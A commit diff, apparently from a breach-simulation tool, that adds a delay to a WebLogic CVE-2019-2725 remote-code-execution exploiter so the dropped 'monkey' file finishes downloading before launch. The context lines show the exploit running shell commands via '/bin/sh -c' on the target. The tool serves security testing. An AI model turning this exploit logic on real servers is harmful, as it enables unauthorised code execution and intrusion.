Added delay in weblogic to make exploiter more reliable
This commit is contained in:
parent
8c69cc0af9
commit
06182a485a
|
@ -252,6 +252,7 @@ class WebLogic201710271(WebRCE):
|
||||||
# https://github.com/rapid7/metasploit-framework/pull/11780
|
# https://github.com/rapid7/metasploit-framework/pull/11780
|
||||||
class WebLogic20192725(WebRCE):
|
class WebLogic20192725(WebRCE):
|
||||||
URLS = ["_async/AsyncResponseServiceHttps"]
|
URLS = ["_async/AsyncResponseServiceHttps"]
|
||||||
|
DELAY_BEFORE_EXPLOITING_SECONDS = 5
|
||||||
|
|
||||||
_TARGET_OS_TYPE = WebLogicExploiter._TARGET_OS_TYPE
|
_TARGET_OS_TYPE = WebLogicExploiter._TARGET_OS_TYPE
|
||||||
_EXPLOITED_SERVICE = WebLogicExploiter._EXPLOITED_SERVICE
|
_EXPLOITED_SERVICE = WebLogicExploiter._EXPLOITED_SERVICE
|
||||||
|
@ -266,6 +267,11 @@ class WebLogic20192725(WebRCE):
|
||||||
exploit_config['dropper'] = True
|
exploit_config['dropper'] = True
|
||||||
return exploit_config
|
return exploit_config
|
||||||
|
|
||||||
|
def execute_remote_monkey(self, url, path, dropper=False):
|
||||||
|
# Without delay exploiter tries to launch monkey file that is still finishing up after downloading.
|
||||||
|
time.sleep(WebLogic20192725.DELAY_BEFORE_EXPLOITING_SECONDS)
|
||||||
|
super(WebLogic20192725, self).execute_remote_monkey(url, path, dropper)
|
||||||
|
|
||||||
def exploit(self, url, command):
|
def exploit(self, url, command):
|
||||||
if 'linux' in self.host.os['type']:
|
if 'linux' in self.host.os['type']:
|
||||||
payload = self.get_exploit_payload('/bin/sh', '-c', command)
|
payload = self.get_exploit_payload('/bin/sh', '-c', command)
|
||||||
|
|
Loading…
Reference in New Issue